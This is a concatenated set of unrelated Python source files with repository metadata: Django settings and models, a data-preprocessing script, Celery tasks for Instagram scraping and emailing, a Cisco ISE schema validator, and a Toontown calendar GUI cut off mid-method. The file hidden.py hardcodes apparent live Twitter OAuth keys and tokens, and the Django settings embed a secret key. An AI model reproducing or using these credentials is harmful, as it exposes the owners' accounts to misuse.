| false
| 3,174
|
py
|
"""
Django settings for core project.
Generated by 'django-admin startproject' using Django 2.2.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '-$ih564fx733-qjz!2l$gfxnl=c^b-0go-(%=f#-ey8_-azmn$'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'records',
'whispers',
'users',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'core.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'core.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
"static"
]
|
[
"justyna.andrejczuk@gmail.com"
] |
justyna.andrejczuk@gmail.com
|
ae6a7f58779bac67a6b31a8b4e812919d06641ee
|
2ec6862beae3dc2f788ca66cce15ef8a6d2c9c3c
|
/preproc.py
|
d0064f9cf4b99462ad5a55d8abd9a740e5bfa098
|
[] |
no_license
|
jpmcd/vowpal-wabbit-works
|
8fa5eca43dab874d24b4f6384b39a7b1d6512763
|
e87122588b3ac34cd122092c252d3dee4327cecd
|
refs/heads/master
| 2021-01-24T20:41:50.650928
| 2016-02-03T17:35:35
| 2016-02-03T17:35:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 837
|
py
|
import re
import sys
import random
p = float(sys.argv[1])
if p < 0 or p > 1:
print "input valid p, 0<=p<=1"
exit()
w_bool = bool(sys.argv[2] and sys.argv[3])
if w_bool:
w_pos = float(sys.argv[2])
w_neg = float(sys.argv[3])
else:
w_pos = 1.
w_neg = 1.
train = open("train.dat","w")
test = open("test.dat","w")
for i in range(1):
with open("/scratch/url_svmlight/Day"+str(i)+".svm","r") as f:
for line in f:
newline = re.sub(r"^-1", "0 %f |f"%w_neg, line)
newline = re.sub(r"^\+1", "1 %f |f"%w_pos, newline)
newline = re.sub(r"$\s", " const:.01\n", newline)
rand = random.random()
if rand < p:
test.write(newline)
else:
train.write(newline)
#exit()
train.close()
test.close()
|
[
"josephpmcdonald@gmail.com"
] |
josephpmcdonald@gmail.com
|
af695ef76b65ad605049e07f2f5afdc8137d801f
|
93ba1198906bf36edfc5e62c28e11bb4db754186
|
/venv/bin/easy_install-3.7
|
bb3f99e47a67d63abbcd1e6a46b5b04a73747619
|
[] |
no_license
|
ccc-team44/tweet-analysis
|
5e44d146fccd82c9d844ed1bc91e9ce3bbdb39e2
|
7724b27c3fdb7167978cf1257d68a605dd7ead1d
|
refs/heads/master
| 2022-10-04T03:18:32.311770
| 2020-06-11T08:56:11
| 2020-06-11T08:56:11
| 264,067,135
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 444
|
7
|
#!/Users/xinweiding/tweet-analysis/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.7'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.7')()
)
|
[
"xind1cl@gmail.com"
] |
xind1cl@gmail.com
|
b26ea98bc20a0e8e0521ec75161d78c8d31340d3
|
bbf02a2dfa11a8abb0ac8602a85b669a839c06cb
|
/caladonis/workouts/models.py
|
6380fb6f05bff21049651f358fa99aece348ea28
|
[] |
no_license
|
perezal/api.caladonis.com
|
7e48af60607c45cae125e17e36ba7f560ad25e1e
|
dce3e67d2a197980a82044cda3bdb19c03075192
|
refs/heads/master
| 2020-03-15T02:00:18.505023
| 2018-05-17T01:18:46
| 2018-05-17T01:18:46
| 131,907,608
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 648
|
py
|
from django.db import models
from django.contrib.auth.models import User
class Workout(models.Model):
account = models.ForeignKey(User, on_delete=models.CASCADE)
date = models.DateTimeField('workout date', auto_now_add=True)
notes = models.TextField(default='')
class Exercise(models.Model):
workout = models.ForeignKey(Workout, related_name="exercises", on_delete=models.CASCADE)
name = models.CharField(max_length=20)
class Set(models.Model):
exercise = models.ForeignKey(Exercise, related_name="sets", on_delete=models.CASCADE)
reps = models.IntegerField(default=0)
weight = models.IntegerField(default=0)
|
[
"redflare@gmail.com"
] |
redflare@gmail.com
|
2e84d8d5c0b440ec8f046db0a63b3cb5a11f5f7c
|
77945f2e1e3cfd2920ef3b71fa626d23d643c4f2
|
/code3/hidden.py
|
8c2d0b37e8f10e3b0f264c3b744da12e774ba69b
|
[] |
no_license
|
justingfoster/p4e
|
9226cf5a6972a0a2520c5696abef5cdc37a964a0
|
fdcb9db475498e24b7ef77b07c1a3c1688b87bb2
|
refs/heads/master
| 2021-01-01T15:32:53.733498
| 2017-09-19T16:02:18
| 2017-09-19T16:02:18
| 97,640,953
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 409
|
py
|
# Keep this file separate
# https://apps.twitter.com/
# Create new App and get the four strings
def oauth():
return {"consumer_key": "teFVNZ4kMr76wwb0q1D4AMTUZ",
"consumer_secret": "73RazktJRaJjlAPyOerMLGA47J1c83ZVYMWiQ76BMA1HyVhdjU",
"token_key": "892077162475421697-5rSinUKpLHPcmJkfgGtUcpcxyi51mmy",
"token_secret": "XbegLZ3M3YYHAWfJBwgV1UvPY1dsP913iL2SK05CGC88G"}
|
[
"justingfoster@hotmail.com"
] |
justingfoster@hotmail.com
|
6ca562dbf7053d70020705006ef520d4ed60caf0
|
1a75bf92c35eb51b0181862102afcf819a71ab23
|
/ig_review/tasks/__init__.py
|
ee1f7acabcbfb231dec485875da3f034142faabc
|
[] |
no_license
|
Skinner927/ig-review
|
867202b3e039dc9529930f0844be37103bb29ddb
|
192b4f07e76682771dd9fbdac83d6b42ebaf9011
|
refs/heads/master
| 2021-04-03T01:37:53.714115
| 2018-03-13T00:11:18
| 2018-03-13T00:11:18
| 124,973,337
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,574
|
py
|
"""
Run as:
celery worker -A ig_review.tasks -B
And debugging:
celery worker -A ig_review.tasks --loglevel=info -E -B
"""
# Ensure to use absolute module reference or celery worker may not work
from celery.signals import beat_init
from email.message import EmailMessage
from ig_review import factory
from ig_review.api.image_storage import RootImageStorage
from instagram_scraper import InstagramScraper
from pathlib import Path
import functools
import imghdr
import os
import os.path
import smtplib
app = factory.create_celery_app(__name__)
def single_instance_task(func):
"""
Decorator to prevent tasks from running at the same time.
Works independent of OS and process/thread.
:param func:
:return:
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
self = args[0]
func_name = 'celerylock-' + func.__name__
lock_file = os.path.join(self.app.conf['LOCKFILE_DIR'], func_name)
try:
f = open(lock_file, 'x')
f.write(str(os.getpid()))
except OSError:
# Someone holds the lock, get out!
self.log.info('wanted to run but locked ' + func_name)
return
try:
return func(*args, **kwargs)
finally:
f.close()
os.remove(lock_file)
return wrapper
@app.on_after_configure.connect
def schedule_tasks(sender, **kwargs):
interval = 60.0 * float(sender.conf['SCRAPE_IG_INTERVAL'])
sender.add_periodic_task(interval, do_scrape.s(), name='Scrape IG at interval')
interval = 60.0 * float(sender.conf['SEND_IG_APPROVED'])
sender.add_periodic_task(interval, do_mail_images.s(), name='Send reviewed images')
@beat_init.connect
def kick_first_task(sender, **kwargs):
do_scrape.delay()
do_mail_images.delay()
@app.task(bind=True)
@single_instance_task
def do_scrape(self):
self.log.info('Scraping IG as ' + self.app.conf['SCRAPE_IG_USER'])
scraper = InstagramScraper(
login_user=self.app.conf['SCRAPE_IG_USER'],
login_pass=self.app.conf['SCRAPE_IG_PASS'],
usernames=self.app.conf['SCRAPE_IG_FRIENDS'],
destination=self.app.conf['IMAGES_REVIEW_DIR'],
retain_username=True,
media_types=['image', 'story-image'],
maximum=self.app.conf['SCRAPE_IG_MAX_PER_FRIEND'],
latest_stamps=os.path.join(self.app.conf['STORAGE_ROOT'], 'ig_user_stamps.ini'),
)
scraper.scrape()
self.log.info('Done scraping IG without errors as ' + self.app.conf['SCRAPE_IG_USER'])
@app.task(bind=True)
@single_instance_task
def do_mail_images(self):
if not self.app.conf['SEND_IG_SMTP_ENABLED']:
self.log.info('Sending images is disabled')
return
self.log.info('Starting to send images')
# Create a message
msg = EmailMessage()
msg['Subject'] = self.app.conf['SEND_IG_SMTP_SUBJECT']
msg['From'] = self.app.conf['SEND_IG_SMTP_FROM']
msg['To'] = ', '.join(self.app.conf['SEND_IG_SMTP_TO'])
# Get all images
img_dir = Path(self.app.conf['IMAGES_SEND_DIR'])
max_files = self.app.conf['SEND_IG_SMTP_MAX_ATTACHMENTS']
files_sent = 0
for file in img_dir.iterdir():
if files_sent >= max_files:
break
# Ensure they're legit
if not RootImageStorage.valid_image_file(file):
self.log.warning('Invalid image file in send directory ' + str(file))
os.remove(file)
continue
with open(file, 'rb') as f:
img_data = f.read()
msg.add_attachment(img_data,
maintype='image',
subtype=imghdr.what(None, img_data),
filename=os.path.basename(file))
files_sent += 1
if files_sent < 1:
self.log.info('No images to send')
return
# Create SMTP sender
with smtplib.SMTP(host=self.app.conf['SEND_IG_SMTP_HOST'],
port=self.app.conf['SEND_IG_SMTP_PORT']) as s:
secure = self.app.conf['SEND_IG_SMTP_SECURE']
if isinstance(secure, tuple) or secure:
kwargs = {}
if len(secure) > 0:
kwargs['keyfile'] = secure[0]
if len(secure) == 2:
kwargs['certfile'] = secure[1]
s.starttls(**kwargs)
if self.app.conf['SEND_IG_SMTP_USER']:
s.login(self.app.conf['SEND_IG_SMTP_USER'], self.app.conf['SEND_IG_SMTP_PASS'])
s.send_message(msg)
self.log.info('Done sending {} images without errors'.format(files_sent))
|
[
"skinner927@gmail.com"
] |
skinner927@gmail.com
|
bf6070165ba4c074e3b6f0ade42f7ef065fcf59b
|
57c5ce8c1bfafee2ea53347052f26d018a77c795
|
/alien.py
|
8698021bef75eb6543ebe0ffb9598ecfd025f069
|
[] |
no_license
|
core571/alien_invasion
|
24216c5a0ec19b32a4a266649ac4c9d59eab004e
|
6aeccbc4d472a48a3d8649d855e4a39fede5eb2e
|
refs/heads/master
| 2020-03-19T09:01:32.888150
| 2018-06-07T02:38:17
| 2018-06-07T02:38:17
| 136,254,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,291
|
py
|
import pygame
from pygame.sprite import Sprite
class Alien(Sprite):
"""表示单个外星人的类"""
def __init__(self, ai_settings, screen):
"""初始化外星人并设置其起始位置"""
super(Alien, self).__init__()
self.screen = screen
self.ai_settings = ai_settings
# 加载外星人图像,并设置其rect属性
self.image = pygame.image.load('images/alien.bmp')
self.rect = self.image.get_rect()
# 每个外星人最初都在屏幕左上角附近
self.rect.x = self.rect.width
self.rect.y = self.rect.height
# 存储外星人的准确位置
self.x = float(self.rect.x)
def blitme(self):
"""在指定位置绘制外星人"""
self.screen.blit(self.image, self.rect)
def check_edges(self):
"""如果外星人位于屏幕边缘,就返回True"""
screen_rect = self.screen.get_rect()
if self.rect.right >= screen_rect.right:
return True
elif self.rect.left <= 0:
return True
def update(self):
"""向左或向右移动外星人"""
self.x += (self.ai_settings.alien_speed_factor *
self.ai_settings.fleet_direction)
self.rect.x = self.x
|
[
"wqr571@outlook.com"
] |
wqr571@outlook.com
|
3e3460ed023a46892882b4db2f912938a5a5f08b
|
16bf89ec6848c78f4aad3e87b5e386bb86f92815
|
/Mypython-code-master/badasechota.py
|
0991fe952c0eaea211b90fa276f746abd7462462
|
[] |
no_license
|
95ankitmishra/Program-data_structure
|
bae865e72800ade5ed99feb516015820ac876805
|
fc2e9a09c5e382a718b44d9e1ee03cad3442f2f7
|
refs/heads/master
| 2020-06-17T22:18:02.785493
| 2019-07-09T21:00:53
| 2019-07-09T21:00:53
| 196,077,979
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 114
|
py
|
arr=[int(x) for x in input("enter elements").split(',')]
arr.sort()
arr.reverse()
print("bada se chota",arr)
|
[
"noreply@github.com"
] |
95ankitmishra.noreply@github.com
|
96a7799af3063690f59693c3545834464fa5aaaf
|
77178627b46d5b0440d64af70b88bdb91f5269ab
|
/blog/models.py
|
8872bbb7a55fa2a08875969e0b06b12647a011f3
|
[] |
no_license
|
daredavil01/blog-fastapi
|
a9f40835fdc9b42151fa049c0aab3f1a62e810da
|
4153a150c4380537d00f747b2445f4e183c34cb4
|
refs/heads/main
| 2023-06-26T07:24:12.830961
| 2021-07-31T14:50:24
| 2021-07-31T14:50:24
| 391,384,672
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 647
|
py
|
from sqlalchemy import Column, Integer, String, ForeignKey
from blog.database import Base
from sqlalchemy.orm import relationship
class Blog(Base):
__tablename__ = 'blogs'
id = Column(Integer, primary_key=True, index=True)
title = Column(String)
body = Column(String)
user_id = Column(Integer, ForeignKey("users.id"))
creator = relationship("User", back_populates="blogs")
class User(Base):
__tablename__ = 'users'
id = Column(Integer, primary_key=True, index=True)
name = Column(String)
email = Column(String)
password = Column(String)
blogs = relationship("Blog", back_populates="creator")
|
[
"sanket.tambare01@gmail.com"
] |
sanket.tambare01@gmail.com
|
3ea536a721bb17fa0229848067424923e14c558e
|
4e30d990963870478ed248567e432795f519e1cc
|
/tests/models/validators/v3_1_patch_1/jsd_c0984cde5e925c209ab87472ab905476.py
|
c86e4452c3079233469acbb06dd25ed2dec223d4
|
[
"MIT"
] |
permissive
|
CiscoISE/ciscoisesdk
|
84074a57bf1042a735e3fc6eb7876555150d2b51
|
f468c54998ec1ad85435ea28988922f0573bfee8
|
refs/heads/main
| 2023-09-04T23:56:32.232035
| 2023-08-25T17:31:49
| 2023-08-25T17:31:49
| 365,359,531
| 48
| 9
|
MIT
| 2023-08-25T17:31:51
| 2021-05-07T21:43:52
|
Python
|
UTF-8
|
Python
| false
| false
| 8,186
|
py
|
# -*- coding: utf-8 -*-
"""Identity Services Engine getNetworkAccessConditionsForPolicySets data model.
Copyright (c) 2021 Cisco and/or its affiliates.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import json
from builtins import *
import fastjsonschema
from ciscoisesdk.exceptions import MalformedRequest
class JSONSchemaValidatorC0984Cde5E925C209Ab87472Ab905476(object):
"""getNetworkAccessConditionsForPolicySets request schema definition."""
def __init__(self):
super(JSONSchemaValidatorC0984Cde5E925C209Ab87472Ab905476, self).__init__()
self._validator = fastjsonschema.compile(json.loads(
'''{
"$schema": "http://json-schema.org/draft-04/schema#",
"properties": {
"response": {
"items": {
"properties": {
"attributeName": {
"type": "string"
},
"attributeValue": {
"type": "string"
},
"children": {
"items": {
"properties": {
"conditionType": {
"enum": [
"ConditionAndBlock",
"ConditionAttributes",
"ConditionOrBlock",
"ConditionReference",
"LibraryConditionAndBlock",
"LibraryConditionAttributes",
"LibraryConditionOrBlock",
"TimeAndDateCondition"
],
"type": "string"
},
"isNegate": {
"type": "boolean"
},
"link": {
"properties": {
"href": {
"type": "string"
},
"rel": {
"enum": [
"next",
"previous",
"self",
"status"
],
"type": "string"
},
"type": {
"type": "string"
}
},
"type": "object"
}
},
"type": "object"
},
"type": "array"
},
"conditionType": {
"enum": [
"ConditionAndBlock",
"ConditionAttributes",
"ConditionOrBlock",
"ConditionReference",
"LibraryConditionAndBlock",
"LibraryConditionAttributes",
"LibraryConditionOrBlock",
"TimeAndDateCondition"
],
"type": "string"
},
"datesRange": {
"properties": {
"endDate": {
"type": "string"
},
"startDate": {
"type": "string"
}
},
"type": "object"
},
"datesRangeException": {
"properties": {
"endDate": {
"type": "string"
},
"startDate": {
"type": "string"
}
},
"type": "object"
},
"description":
{
"type": "string"
},
"dictionaryName": {
"type": "string"
},
"dictionaryValue": {
"type": "string"
},
"hoursRange": {
"properties": {
"endTime": {
"type": "string"
},
"startTime": {
"type": "string"
}
},
"type": "object"
},
"hoursRangeException": {
"properties": {
"endTime": {
"type": "string"
},
"startTime": {
"type": "string"
}
},
"type": "object"
},
"id": {
"type": "string"
},
"isNegate": {
"type": "boolean"
},
"link": {
"properties": {
"href": {
"type": "string"
},
"rel": {
"enum": [
"next",
"previous",
"self",
"status"
],
"type": "string"
},
"type": {
"type": "string"
}
},
"type": "object"
},
"name": {
"type": "string"
},
"operator": {
"enum": [
"contains",
"endsWith",
"equals",
"greaterOrEquals",
"greaterThan",
"in",
"ipEquals",
"ipGreaterThan",
"ipLessThan",
"ipNotEquals",
"lessOrEquals",
"lessThan",
"matches",
"notContains",
"notEndsWith",
"notEquals",
"notIn",
"notStartsWith",
"startsWith"
],
"type": "string"
},
"weekDays": {
"items": {
"enum": [
"Friday",
"Monday",
"Saturday",
"Sunday",
"Thursday",
"Tuesday",
"Wednesday"
],
"type": "string"
},
"type": "array"
},
"weekDaysException": {
"items": {
"enum": [
"Friday",
"Monday",
"Saturday",
"Sunday",
"Thursday",
"Tuesday",
"Wednesday"
],
"type": "string"
},
"type": "array"
}
},
"type": "object"
},
"type": "array"
},
"version": {
"type": "string"
}
},
"required": [
"response",
"version"
],
"type": "object"
}'''.replace("\n" + ' ' * 16, '')
))
def validate(self, request):
try:
self._validator(request)
except fastjsonschema.exceptions.JsonSchemaException as e:
raise MalformedRequest(
'{} is invalid. Reason: {}'.format(request, e.message)
)
|
[
"bvargas@altus.cr"
] |
bvargas@altus.cr
|
e1b200a25da813398431400b47064af2a8e368d4
|
8e69eee9b474587925e22413717eb82e4b024360
|
/v2.5.7/toontown/parties/CalendarGuiMonth.py
|
1fb599e6de7003a2926a7423453b5db44280d3e1
|
[
"MIT"
] |
permissive
|
TTOFFLINE-LEAK/ttoffline
|
afaef613c36dc3b70514ccee7030ba73c3b5045b
|
bb0e91704a755d34983e94288d50288e46b68380
|
refs/heads/master
| 2020-06-12T15:41:59.411795
| 2020-04-17T08:22:55
| 2020-04-17T08:22:55
| 194,348,185
| 5
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,713
|
py
|
import calendar
from datetime import timedelta, datetime
from panda3d.core import Vec4, TextNode
from direct.gui.DirectGui import DirectFrame, DirectLabel, DirectButton, DirectScrolledList, DGG
from toontown.toonbase import TTLocalizer
from toontown.toonbase import ToontownGlobals
from toontown.parties.CalendarGuiDay import CalendarGuiDay
class CalendarGuiMonth(DirectFrame):
notify = directNotify.newCategory('CalendarGuiMonth')
def __init__(self, parent, startingDateTime, scale=1.0, pos=(0, 0, -0.1), dayClickCallback=None, onlyFutureDaysClickable=False, onlyFutureMonthsClickable=False):
self.startDate = startingDateTime
self.curDate = startingDateTime
self.dayClickCallback = dayClickCallback
self.onlyFutureDaysClickable = onlyFutureDaysClickable
self.onlyFutureMonthsClickable = onlyFutureMonthsClickable
if self.onlyFutureDaysClickable:
self.onlyFutureMonthsClickable = True
DirectFrame.__init__(self, parent=parent, scale=scale, pos=pos)
self.showMarkers = config.GetBool('show-calendar-markers', 0)
self.load()
self.createGuiObjects()
self.lastSelectedDate = None
self.accept('clickedOnDay', self.clickedOnDay)
return
def createDummyLocators(self):
self.monthLocator = self.attachNewNode('monthLocator')
self.monthLocator.setZ(0.6)
self.weekDayLocators = []
for i in xrange(7):
self.weekDayLocators.append(self.attachNewNode('weekDayLocator-%d' % i))
self.weekDayLocators[i].setZ(0.5)
self.weekDayLocators[i].setX(i * 0.24 + -0.75)
dayTopLeftX = -0.8
dayTopLeftZ = 0.4
self.dayLocators = []
for row in xrange(6):
oneWeek = []
for col in xrange(7):
newDayLoc = self.attachNewNode('dayLocator-row-%d-col-%d' % (row, col))
newDayLoc.setX(col * 0.24 + dayTopLeftX)
newDayLoc.setZ(row * -0.18 + dayTopLeftZ)
oneWeek.append(newDayLoc)
self.dayLocators.append(oneWeek)
self.monthLeftLocator = self.attachNewNode('monthLeft')
self.monthLeftLocator.setPos(-0.3, 0, 0.65)
self.monthRightLocator = self.attachNewNode('monthRight')
self.monthRightLocator.setPos(0.3, 0, 0.65)
def attachMarker(self, parent, scale=0.01, color=(1, 0, 0)):
if self.showMarkers:
marker = loader.loadModel('phase_3/models/misc/sphere')
marker.reparentTo(parent)
marker.setScale(scale)
marker.setColor(*color)
def load(self):
if base.cr.newsManager.isHolidayRunning(ToontownGlobals.ORANGES):
self.monthLabel = DirectLabel(parent=self, relief=None, text='IT IS MARCH 32', text_scale=0.075, text_font=ToontownGlobals.getSuitFont(), text_fg=(40 / 255.0,
140 / 255.0,
246 / 255.0,
1.0))
else:
monthAsset = loader.loadModel('phase_4/models/parties/tt_m_gui_sbk_calendar')
monthAsset.reparentTo(self)
self.monthLocator = self.find('**/locator_month/locator_month')
self.attachMarker(self.monthLocator)
self.weekDayLocators = []
for weekday in ('sun', 'mon', 'tue', 'wed', 'thu', 'fri', 'sat'):
weekDayLoc = self.find('**/loc_%s' % weekday)
self.weekDayLocators.append(weekDayLoc)
self.attachMarker(weekDayLoc)
self.dayLocators = []
for row in xrange(6):
oneWeek = []
for col in xrange(7):
newDayLoc = self.find('**/loc_box_%s_%s' % (row, col))
oneWeek.append(newDayLoc)
self.dayLocators.append(oneWeek)
self.monthLeftLocator = self.find('**/locator_month_arrowL')
self.monthRightLocator = self.find('**/locator_month_arrowR')
self.filterLocator = self.find('**/locator_filter')
self.filterLocatorArrowUp = self.find('**/locator_filter_arrowTop')
self.filterLocatorArrowDown = self.find('**/locator_filter_arrowBottom')
self.yearLocator = self.attachNewNode('yearLocator')
self.yearLocator.setPos(self.monthLocator, 0, 0, -0.03)
return
def createGuiObjects(self):
if base.cr.newsManager.isHolidayRunning(ToontownGlobals.ORANGES):
return
self.monthLabel = DirectLabel(parent=self.monthLocator, relief=None, text=TTLocalizer.Months[self.startDate.month], text_scale=0.075, text_font=ToontownGlobals.getMinnieFont(), text_fg=(40 / 255.0,
140 / 255.0,
246 / 255.0,
1.0))
self.yearLabel = DirectLabel(parent=self.yearLocator, relief=None, text=str(self.startDate.year), text_scale=0.03, text_font=ToontownGlobals.getMinnieFont(), text_fg=(140 / 255.0,
140 / 255.0,
246 / 255.0,
1.0))
self.weekdayLabels = []
for posIndex in xrange(7):
adjustedNameIndex = (posIndex - 1) % 7
self.weekdayLabels.append(DirectLabel(parent=self.weekDayLocators[posIndex], relief=None, text=TTLocalizer.DayNamesAbbrev[adjustedNameIndex], text_font=ToontownGlobals.getInterfaceFont(), text_fg=(255 / 255.0,
146 / 255.0,
113 / 255.0,
1.0), text_scale=0.05))
self.createGuiDays()
arrowUp = self.find('**/month_arrowR_up')
arrowDown = self.find('**/month_arrowR_down')
arrowHover = self.find('**/month_arrowR_hover')
self.monthLeftArrow = DirectButton(parent=self.monthLeftLocator, relief=None, image=(arrowUp,
arrowDown,
arrowHover,
arrowUp), image3_color=Vec4(1, 1, 1, 0.5), scale=(-1.0, 1.0, 1.0), command=self.__doMonthLeft)
if self.onlyFutureMonthsClickable:
self.monthLeftArrow.hide()
self.monthRightArrow = DirectButton(parent=self.monthRightLocator, relief=None, image=(arrowUp,
arrowDown,
arrowHover,
arrowUp), image3_color=Vec4(1, 1, 1, 0.5), command=self.__doMonthRight)
def makeLabel(itemName, itemNum, *extraArgs):
return DirectLabel(text=itemName, frameColor=(0, 0, 0, 0), text_scale=0.04)
gui = loader.loadModel('phase_4/models/parties/tt_m_gui_sbk_calendar_box')
arrowUp = gui.find('**/downScroll_up')
arrowDown = gui.find('**/downScroll_down')
arrowHover = gui.find('**/downScroll_hover')
filterLocatorUpPos = self.filterLocatorArrowUp.getPos(self.filterLocator)
filterLocatorDownPos = self.filterLocatorArrowDown.getPos(self.filterLocator)
self.filterList = DirectScrolledList(parent=self.filterLocator, relief=None, pos=(0,
0,
0), image=None, text_scale=0.025, incButton_image=(arrowUp,
arrowDown,
arrowHover,
arrowUp), incButton_relief=None, incButton_pos=filterLocatorDownPos, incButton_image3_color=Vec4(1, 1, 1, 0.2), incButtonCallback=self.filterChanged, decButton_image=(arrowUp,
arrowDown,
arrowHover,
arrowUp), decButton_relief=None, decButton_pos=filterLocatorUpPos, decButton_scale=(1,
1,
-1), decButton_image3_color=Vec4(1, 1, 1, 0.2), decButtonCallback=self.filterChanged, numItemsVisible=1, itemMakeFunction=makeLabel, items=[TTLocalizer.CalendarShowAll, TTLocalizer.CalendarShowOnlyHolidays, TTLocalizer.CalendarShowOnlyParties], itemFrame_frameSize=(-0.2,
0.2,
-0.02,
0.05), itemFrame_frameColor=(0,
0,
0,
0))
gui.removeNode()
return
def getTopLeftDate(self):
firstOfTheMonth = self.curDate.replace(day=1)
daysAwayFromSunday = (firstOfTheMonth.weekday() - 6) % 7
topLeftDate = firstOfTheMonth + timedelta(days=-daysAwayFromSunday)
return topLeftDate
def createGuiDays(self):
topLeftDate = self.getTopLeftDate()
curDate = topLeftDate
self.guiDays = []
for row in self.dayLocators:
for oneLocator in row:
self.guiDays.append(CalendarGuiDay(oneLocator, curDate, self.curDate, self.dayClickCallback, self.onlyFutureDaysClickable))
curDate += timedelta(days=1)
def changeDateForGuiDays(self):
topLeftDate = self.getTopLeftDate()
guiDayDate = topLeftDate
for guiDay in self.guiDays:
guiDay.changeDate(self.curDate, guiDayDate)
guiDayDate += timedelta(days=1)
def changeMonth(self, monthChange):
if hasattr(base, 'cr') and base.cr.newsManager.isHolidayRunning(ToontownGlobals.ORANGES):
return
if monthChange != 0:
newMonth = self.curDate.month + monthChange
newYear = self.curDate.year
while newMonth > 12:
newYear += 1
newMonth -= 12
while newMonth < 1:
if newYear - 1 > 1899:
newMonth += 12
newYear -= 1
else:
newMonth += 1
self.curDate = datetime(newYear, newMonth, 1, self.curDate.time().hour, self.curDate.time().minute, self.curDate.time().second, self.curDate.time().microsecond, self.curDate.tzinfo)
self.monthLabel['text'] = (
TTLocalizer.Months[self.curDate.month],)
self.yearLabel['text'] = (str(self.curDate.year),)
startTime = globalClock.getRealTime()
self.changeDateForGuiDays()
endTime = globalClock.getRealTime()
self.notify.debug('changeDate took %f seconds' % (endTime - startTime))
self.updateSelectedDate()
if monthChange != 0:
if self.onlyFutureMonthsClickable and newMonth == self.startDate.month and newYear == self.startDate.year:
self.monthLeftArrow.hide()
def __doMonthLeft(self):
self.changeMonth(-1)
def __doMonthRight(self):
self.monthLeftArrow.show()
self.changeMonth(1)
def destroy(self):
self.ignoreAll()
try:
self.dayClickCallback = None
self.monthLeftArrow.destroy()
self.monthRightArrow.destroy()
for day in self.guiDays:
if day is not None:
day.destroy()
day = None
self.filterList.destroy()
except:
pass
DirectFrame.destroy(self)
return
def clickedOnDay(self, dayDate):
self.lastSelectedDate = dayDate
self.updateSelectedDate()
def updateSelectedDate(self):
if self.lastSelectedDate:
for oneGuiDay in self.guiDays:
if oneGuiDay.myDate.date() == self.lastSelectedDate:
